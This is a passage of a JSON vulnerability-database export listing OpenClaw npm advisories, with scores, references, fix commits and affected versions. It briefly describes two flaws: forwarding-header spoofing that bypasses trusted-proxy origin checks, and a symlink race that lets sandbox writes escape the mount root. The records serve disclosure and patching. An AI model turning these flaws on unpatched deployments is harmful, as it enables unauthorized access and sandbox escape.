"generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx" }, { "reference_url": "https://github.com/advisories/GHSA-j9pv-rrcj-6pfx", "reference_id": "GHSA-j9pv-rrcj-6pfx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j9pv-rrcj-6pfx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-j9pv-rrcj-6pfx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sja9-6t41-hud8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91179?format=api", "vulnerability_id": "VCID-sw3m-5ryw-jbdh", "summary": "OpenClaw: Forwarding header spoofing bypasses gateway.trustedProxies origin detection\n## Summary\nWhen gateway.trustedProxies was configured, spoofed loopback hops in forwarding headers could be accepted as the client origin and weaken downstream auth and rate-limit decisions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/net.ts now ignores loopback forwarded hops before trusted-proxy client resolution.\n- That shipped origin fix is the one consumed by canvas auth and gateway auth-rate-limit paths that rely on resolved client identity.\n\nOpenClaw thanks @lintsinghua for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35656", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00224", "scoring_system": "epss", "scoring_elements": "0.45223", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00224", "scoring_system": "epss", "scoring_elements": "0.45206", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00224", "scoring_system": "epss", "scoring_elements": "0.45226", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35656" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35656", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35656" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter" }, { "reference_url": "https://github.com/advisories/GHSA-844j-xrrq-wgh4", "reference_id": "GHSA-844j-xrrq-wgh4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-844j-xrrq-wgh4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35656", "GHSA-844j-xrrq-wgh4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sw3m-5ryw-jbdh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92085?format=api", "vulnerability_id": "VCID-t2ve-xemk-mqa9", "summary": "OpenClaw: OpenShell FS bridge writes stay pinned to the sandbox mount root\n## Summary\nOpenShell FS bridge writes stay pinned to the sandbox mount root \n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem writes could let a symlink swap redirect a write outside the intended local mount root.\n\n## Fix\nOpenShell write paths now validate the canonical target against the mount root, reject unsafe symlink parents and symlink leaves for writes, and use root-scoped write helpers before syncing to the remote sandbox.\n\n## Fix Commit(s)\n- 7be82d4fd1193bcb7e44ee38838f00bf924ffa76\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44112", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09643", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09624", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11223", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44112" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "9.6", "scoring_system": "cvssv3.1", 